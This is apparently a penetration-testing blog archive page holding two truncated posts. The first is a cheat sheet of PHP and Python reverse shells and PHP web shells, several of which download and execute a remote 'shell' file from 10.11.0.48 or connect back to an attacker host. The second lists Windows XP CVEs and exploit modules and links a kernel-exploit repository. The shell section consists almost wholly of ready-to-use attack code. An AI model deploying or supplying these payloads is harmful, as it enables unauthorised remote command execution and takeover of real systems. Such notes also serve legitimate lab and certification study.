
Posts

Showing posts from February, 2020

Reverse Shells & Web Shells

PHP Shells:

echo '<?php $sock = fsockopen(" IP_ADDRESS ", PORT ); $proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>' > shell.php # This often does not work because of the double quotes

<?php system("whoami; wget http://10.11.0.48/shell; chmod +x shell; ./shell"); ?>

<?php system("/usr/bin/wget 10.11.0.48:53/shell.txt -O /dev/shm/shell.php; php /dev/shm/shell.php"); ?>

<? php -r '$sock=fsockopen("10.11.0.48",9001);exec("/bin/sh -i <&3 >&3 2>&3");' ?>

<?php echo system($_REQUEST['cmd']); ?>

<?php echo shell_exec($_GET['cmd']); ?>

Get PHP Reverse Shell from here

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((" IP_ADDRESS ", PORT ));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.filen

Windows Vulnerabilities - Listed

Get The Kernel Exploits here --> https://github.com/SecWiki/windows-kernel-exploits

OS based on the version:
10.0.14393 --> Windows Server 2016
10.0.17763 --> Windows Server 2019

[+] Windows vulnerabilities:

Windows XP:
CVE-2012-4349 Unquoted windows search path - Windows provides the capability of including spaces in path names - can be root
CVE-2011-1345 Internet Explorer does not properly handle objects in memory - allows remote execution of code via object
CVE-2010-3138 EXPLOIT-DB 14765 - Untrusted search path vulnerability - allows local users to gain privileges via a Trojan horse
CVE-2011-5046 EXPLOIT-DB 18275 - GDI in windows does not properly validate user-mode input - allows remote code execution
CVE-2002-1214 ms02_063_pptp_dos - exploits a kernel based overflow when sending abnormal PPTP Control Data packets - code execution, DoS
CVE-2003-0352 ms03_026_dcom - exploits a stack buffer overflow in the RPCSS service
CVE-200